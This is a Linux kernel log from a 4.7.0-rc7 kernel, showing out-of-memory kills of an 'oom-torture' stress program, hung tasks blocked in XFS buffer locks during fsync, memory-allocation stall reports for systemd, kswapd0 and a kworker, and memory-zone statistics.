[ 1096.822166]  [<ffffffff8105c840>] __do_page_fault+0x190/0x560
[ 1096.826542]  [<ffffffff8105cc40>] do_page_fault+0x30/0x80
[ 1096.830551]  [<ffffffff81629278>] page_fault+0x28/0x30
[ 1096.835739] Mem-Info:
[ 1096.838525] active_anon:197561 inactive_anon:2919 isolated_anon:0
[ 1096.838525]  active_file:284 inactive_file:479 isolated_file:32
[ 1096.838525]  unevictable:0 dirty:0 writeback:126 unstable:0
[ 1096.838525]  slab_reclaimable:1717 slab_unreclaimable:11222
[ 1096.838525]  mapped:360 shmem:3239 pagetables:5654 bounce:0
[ 1096.838525]  free:12151 free_pcp:319 free_cma:0
[ 1096.867008] Node 0 DMA free:4472kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:44kB inactive_file:44kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:8kB mapped:44kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:796kB kernel_stack:432kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:568 all_unreclaimable? yes
[ 1096.904546] lowmem_reserve[]: 0 936 936 936
[ 1096.909808] Node 0 DMA32 free:45364kB min:44320kB low:55400kB high:66480kB active_anon:781560kB inactive_anon:11676kB active_file:1152kB inactive_file:1196kB unevictable:0kB isolated(anon):0kB isolated(file):256kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:496kB mapped:1396kB shmem:12948kB slab_reclaimable:6716kB slab_unreclaimable:43992kB kernel_stack:20384kB pagetables:22092kB unstable:0kB bounce:0kB free_pcp:716kB local_pcp:124kB free_cma:0kB writeback_tmp:0kB pages_scanned:3852 all_unreclaimable? no
[ 1096.945857] lowmem_reserve[]: 0 0 0 0
[ 1096.950262] Node 0 DMA: 38*4kB (UM) 26*8kB (UM) 11*16kB (UM) 11*32kB (UM) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4472kB
[ 1096.963656] Node 0 DMA32: 1333*4kB (UME) 1032*8kB (UME) 670*16kB (UME) 308*32kB (UME) 111*64kB (UE) 24*128kB (UME) 4*256kB (UM) 0*512kB 0*1024kB 0*2048kB 0*4096kB = 45364kB
[ 1096.976258] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[ 1096.983860] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 1096.994897] 3918 total pagecache pages
[ 1096.999165] 0 pages in swap cache
[ 1097.002688] Swap cache stats: add 0, delete 0, find 0/0
[ 1097.007309] Free swap  = 0kB
[ 1097.010194] Total swap = 0kB
[ 1097.012787] 262013 pages RAM
[ 1097.015345] 0 pages HighMem/MovableOnly
[ 1097.020898] 12770 pages reserved
[ 1097.024751] 0 pages cma reserved
[ 1097.027858] 0 pages hwpoisoned
[ 1097.031473] Out of memory: Kill process 4206 (oom-torture) score 999 or sacrifice child
[ 1097.037825] Killed process 4206 (oom-torture) total-vm:4176kB, anon-rss:84kB, file-rss:0kB, shmem-rss:0kB
[ 1097.045884] oom_reaper: reaped process 4206 (oom-torture), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[ 1200.867049] INFO: task oom-torture:3970 blocked for more than 120 seconds.
[ 1200.890695]       Not tainted 4.7.0-rc7+ #55
[ 1200.898627] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[ 1200.913371] oom-torture     D ffff88003bcff428     0  3970   3652 0x00000080
[ 1200.926432]  ffff88003bcff428 ffff88002a996100 ffff88003fba4080 ffff88002a996100
[ 1200.939946]  ffff88003bd00000 ffff880037de7070 ffff88002a996100 ffff880035d00000
[ 1200.950865]  0000000000000000 ffff88003bcff440 ffffffff81621dea 7fffffffffffffff
[ 1200.957640] Call Trace:
[ 1200.961125]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1200.965512]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1200.970311]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1200.975693]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1200.980603]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1200.985516]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1200.989693]  [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70
[ 1200.994497]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1200.998181]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1201.002629]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1201.007199]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1201.011795]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1201.016359]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1201.021284]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1201.025590]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1201.030407]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1201.035343]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1201.039829]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1201.044235]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1201.048841]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1201.053380]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1201.057632]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1201.062077]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1201.066970]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1201.071307]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1201.075729]  [<ffffffff81158326>] write_cache_pages+0x1f6/0x490
[ 1201.080437]  [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs]
[ 1201.085510]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1201.090299]  [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs]
[ 1201.094736]  [<ffffffff811594ac>] do_writepages+0x1c/0x30
[ 1201.098589]  [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100
[ 1201.103563]  [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60
[ 1201.108244]  [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs]
[ 1201.112542]  [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0
[ 1201.116499]  [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90
[ 1201.120399]  [<ffffffff811ff378>] do_fsync+0x38/0x60
[ 1201.123990]  [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10
[ 1201.127842]  [<ffffffff81003642>] do_syscall_64+0x62/0x190
[ 1201.131751]  [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25
[ 1201.136237] 2 locks held by oom-torture/3970:
[ 1201.141000]  #0:  (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0
[ 1201.147852]  #1:  (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs]
[ 1201.155109] INFO: task oom-torture:4083 blocked for more than 120 seconds.
[ 1201.160866]       Not tainted 4.7.0-rc7+ #55
[ 1201.164425] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[ 1201.170062] oom-torture     D ffff88003aa47428     0  4083   3652 0x00000080
[ 1201.176947]  ffff88003aa47428 ffff88003aa400c0 ffff88002bd3c100 ffff88003aa400c0
[ 1201.182405]  ffff88003aa48000 ffff880037de7070 ffff88003aa400c0 ffff880035d00000
[ 1201.188232]  0000000000000000 ffff88003aa47440 ffffffff81621dea 7fffffffffffffff
[ 1201.194181] Call Trace:
[ 1201.196438]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1201.200074]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1201.204263]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1201.208399]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1201.213164]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1201.217851]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1201.221396]  [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70
[ 1201.225927]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1201.229349]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1201.233532]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1201.237877]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1201.242283]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1201.247024]  [<ffffffff810afc21>] ? enqueue_entity+0x1e1/0xba0
[ 1201.251190]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1201.255961]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1201.260139]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1201.264992]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1201.269857]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1201.274528]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1201.279040]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1201.284013]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1201.288578]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1201.292852]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1201.297644]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1201.302610]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1201.307028]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1201.311537]  [<ffffffff81158326>] write_cache_pages+0x1f6/0x490
[ 1201.315770]  [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs]
[ 1201.322135]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1201.326382]  [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs]
[ 1201.330841]  [<ffffffff811594ac>] do_writepages+0x1c/0x30
[ 1201.335292]  [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100
[ 1201.339950]  [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60
[ 1201.344676]  [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs]
[ 1201.349016]  [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0
[ 1201.353378]  [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90
[ 1201.357354]  [<ffffffff811ff378>] do_fsync+0x38/0x60
[ 1201.360970]  [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10
[ 1201.364887]  [<ffffffff81003642>] do_syscall_64+0x62/0x190
[ 1201.368873]  [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25
[ 1201.373458] 2 locks held by oom-torture/4083:
[ 1201.377979]  #0:  (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0
[ 1201.384627]  #1:  (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs]
[ 1201.392372] INFO: task oom-torture:4126 blocked for more than 120 seconds.
[ 1201.397186]       Not tainted 4.7.0-rc7+ #55
[ 1201.400361] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[ 1201.405791] oom-torture     D ffff880019c5f428     0  4126   3652 0x00000080
[ 1201.413798]  ffff880019c5f428 ffff880019c58040 ffff88003fba4080 ffff880019c58040
[ 1201.419259]  ffff880019c60000 ffff880037de7070 ffff880019c58040 ffff880035d00000
[ 1201.425238]  0000000000000000 ffff880019c5f440 ffffffff81621dea 7fffffffffffffff
[ 1201.430688] Call Trace:
[ 1201.432768]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1201.436438]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1201.440641]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1201.444792]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1201.449212]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1201.453883]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1201.457442]  [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70
[ 1201.461940]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1201.465364]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1201.469653]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1201.474029]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1201.478766]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1201.483480]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1201.488382]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1201.492630]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1201.497546]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1201.502408]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1201.506862]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1201.511693]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1201.516961]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1201.522213]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1201.526631]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1201.531094]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1201.536384]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1201.540818]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1201.545350]  [<ffffffff81158326>] write_cache_pages+0x1f6/0x490
[ 1201.549613]  [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs]
[ 1201.554525]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1201.558776]  [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs]
[ 1201.563217]  [<ffffffff811594ac>] do_writepages+0x1c/0x30
[ 1201.567127]  [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100
[ 1201.571792]  [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60
[ 1201.576518]  [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs]
[ 1201.580860]  [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0
[ 1201.584875]  [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90
[ 1201.588849]  [<ffffffff811ff378>] do_fsync+0x38/0x60
[ 1201.592486]  [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10
[ 1201.596086]  [<ffffffff81003642>] do_syscall_64+0x62/0x190
[ 1201.600028]  [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25
[ 1201.604598] 2 locks held by oom-torture/4126:
[ 1201.609179]  #0:  (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0
[ 1201.618523]  #1:  (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs]
[ 1201.678895] MemAlloc-Info: stalling=112 dying=3 exiting=3 victim=0 oom_count=3275
[ 1201.698443] MemAlloc: systemd(1) flags=0x400900 switches=158149 seq=5087 gfp=0x242134a(GFP_NOFS|__GFP_HIGHMEM|__GFP_COLD|__GFP_NOWARN|__GFP_NORETRY|__GFP_HARDWALL|__GFP_MOVABLE) order=0 delay=81975 uninterruptible
[ 1201.735142] systemd         D ffff88003faef5b8     0     1      0 0x00000000
[ 1201.743813]  ffff88003faef5b8 00000001000dc1d3 ffff88002b3fc040 ffff88003fae8040
[ 1201.752998]  ffff88003faf0000 ffff88003faef5f0 ffff88003d650300 00000001000dc1d3
[ 1201.761073]  0000000000000002 ffff88003faef5d0 ffffffff81621dea ffff88003d650300
[ 1201.766466] Call Trace:
[ 1201.768534]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1201.772339]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1201.776623]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1201.780802]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1201.785651]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1201.790259]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1201.794385]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1201.798338]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1201.803098]  [<ffffffff8100301a>] ? trace_hardirqs_on_thunk+0x1a/0x1c
[ 1201.807690]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1201.811922]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1201.815748]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1201.820144]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1201.824254]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1201.829014]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1201.833220]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1201.837477]  [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160
[ 1201.841758]  [<ffffffff81159d6e>] __do_page_cache_readahead+0x10e/0x370
[ 1201.846403]  [<ffffffff81159dd0>] ? __do_page_cache_readahead+0x170/0x370
[ 1201.851167]  [<ffffffff81149cb7>] ? pagecache_get_page+0x27/0x260
[ 1201.855494]  [<ffffffff8114ce1b>] filemap_fault+0x31b/0x670
[ 1201.859509]  [<ffffffffa0251d00>] ? xfs_ilock+0xd0/0xe0 [xfs]
[ 1201.863631]  [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs]
[ 1201.868073]  [<ffffffff81176e71>] __do_fault+0x71/0x140
[ 1201.871866]  [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30
[ 1201.876068]  [<ffffffff8105c865>] ? __do_page_fault+0x1b5/0x560
[ 1201.880291]  [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560
[ 1201.884492]  [<ffffffff8105c840>] __do_page_fault+0x190/0x560
[ 1201.888952]  [<ffffffff8105cc40>] do_page_fault+0x30/0x80
[ 1201.893093]  [<ffffffff81629278>] page_fault+0x28/0x30
[ 1201.896840] MemAlloc: kswapd0(56) flags=0xa60840 switches=69433 uninterruptible
[ 1201.903736] kswapd0         D ffff880039fa7178     0    56      2 0x00000000
[ 1201.909494]  ffff880039fa7178 0000000000000006 ffffffff81c0d540 ffff880039fa0100
[ 1201.915008]  ffff880039fa8000 ffff880037de7070 ffff880039fa0100 ffff880035d00000
[ 1201.920524]  0000000000000000 ffff880039fa7190 ffffffff81621dea 7fffffffffffffff
[ 1201.925986] Call Trace:
[ 1201.928112]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1201.931838]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1201.936074]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1201.940535]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1201.944987]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1201.949644]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1201.953149]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1201.956682]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1201.960832]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1201.965200]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1201.969536]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1201.973892]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1201.978644]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1201.982842]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1201.987335]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1201.992105]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1201.996447]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1202.000745]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1202.005547]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1202.010018]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1202.014194]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1202.018597]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1202.023493]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1202.028006]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1202.032475]  [<ffffffffa023d886>] xfs_vm_writepage+0x36/0x70 [xfs]
[ 1202.036809]  [<ffffffff8115e1df>] pageout.isra.43+0x18f/0x240
[ 1202.040867]  [<ffffffff8115fa85>] shrink_page_list+0x725/0x950
[ 1202.045348]  [<ffffffff811603a5>] shrink_inactive_list+0x205/0x490
[ 1202.049708]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1202.053893]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1202.057714]  [<ffffffff81162165>] kswapd+0x445/0x830
[ 1202.061317]  [<ffffffff81161d20>] ? mem_cgroup_shrink_node_zone+0xb0/0xb0
[ 1202.066285]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1202.069865]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1202.074064]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
(...snipped...)
[ 1208.254571] MemAlloc: kworker/2:1(4484) flags=0x4208860 switches=41309 seq=15 gfp=0x2400000(GFP_NOIO) order=0 delay=90419 uninterruptible
[ 1208.254573] kworker/2:1     D ffff88002d50b548     0  4484      2 0x00000080
[ 1208.254588] Workqueue: events_freezable_power_ disk_events_workfn
[ 1208.254589]  ffff88002d50b548 00000001000ddb5a ffff88003fb60080 ffff88002d5040c0
[ 1208.254591]  ffff88002d50c000 ffff88002d50b580 ffff88003d690300 00000001000ddb5a
[ 1208.254592]  0000000000000002 ffff88002d50b560 ffffffff81621dea ffff88003d690300
[ 1208.254592] Call Trace:
[ 1208.254594]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1208.254595]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1208.254596]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1208.254597]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1208.254598]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1208.254600]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1208.254601]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1208.254602]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1208.254604]  [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80
[ 1208.254605]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1208.254606]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1208.254607]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1208.254608]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1208.254609]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1208.254610]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1208.254613]  [<ffffffff811a6029>] ? kmem_cache_alloc_node+0x99/0x1d0
[ 1208.254614]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1208.254617]  [<ffffffff812a3b2d>] ? bio_alloc_bioset+0x20d/0x2d0
[ 1208.254618]  [<ffffffff812a4f14>] bio_copy_kern+0xc4/0x180
[ 1208.254619]  [<ffffffff812aff00>] blk_rq_map_kern+0x70/0x130
[ 1208.272701]  [<ffffffff8140f2ad>] scsi_execute+0x12d/0x160
[ 1208.272734]  [<ffffffff8140f3d4>] scsi_execute_req_flags+0x84/0xf0
[ 1208.272738]  [<ffffffffa01e0762>] sr_check_events+0xb2/0x2a0 [sr_mod]
[ 1208.272742]  [<ffffffffa01d4163>] cdrom_check_events+0x13/0x30 [cdrom]
[ 1208.272743]  [<ffffffffa01e0ba5>] sr_block_check_events+0x25/0x30 [sr_mod]
[ 1208.272747]  [<ffffffff812bb6db>] disk_check_events+0x5b/0x150
[ 1208.272749]  [<ffffffff812bb7e7>] disk_events_workfn+0x17/0x20
[ 1208.272752]  [<ffffffff8108e2f5>] process_one_work+0x1a5/0x400
[ 1208.272753]  [<ffffffff8108e291>] ? process_one_work+0x141/0x400
[ 1208.272755]  [<ffffffff8108e676>] worker_thread+0x126/0x490
[ 1208.272756]  [<ffffffff8108e550>] ? process_one_work+0x400/0x400
[ 1208.272758]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1208.272761]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1208.272762]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
[ 1208.272858] Mem-Info:
[ 1208.272864] active_anon:197951 inactive_anon:2919 isolated_anon:0
[ 1208.272864]  active_file:497 inactive_file:551 isolated_file:23
[ 1208.272864]  unevictable:0 dirty:0 writeback:204 unstable:0
[ 1208.272864]  slab_reclaimable:1715 slab_unreclaimable:10861
[ 1208.272864]  mapped:696 shmem:3239 pagetables:5438 bounce:0
[ 1208.272864]  free:12363 free_pcp:219 free_cma:0
[ 1208.272869] Node 0 DMA free:4476kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:12kB inactive_file:20kB unevictable:0kB isolated(anon):0kB isolated(file):92kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:28kB mapped:12kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:756kB kernel_stack:432kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 1208.272870] lowmem_reserve[]: 0 936 936 936
[ 1208.272874] Node 0 DMA32 free:44976kB min:44320kB low:55400kB high:66480kB active_anon:783204kB inactive_anon:11676kB active_file:1976kB inactive_file:2184kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:788kB mapped:2772kB shmem:12948kB slab_reclaimable:6712kB slab_unreclaimable:42688kB kernel_stack:20384kB pagetables:21228kB unstable:0kB bounce:0kB free_pcp:876kB local_pcp:104kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 1208.272875] lowmem_reserve[]: 0 0 0 0
[ 1208.272883] Node 0 DMA: 37*4kB (U) 27*8kB (UM) 13*16kB (UM) 10*32kB (U) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4476kB
[ 1208.272888] Node 0 DMA32: 1420*4kB (UME) 1010*8kB (UME) 661*16kB (UME) 323*32kB (UME) 117*64kB (UME) 22*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44976kB
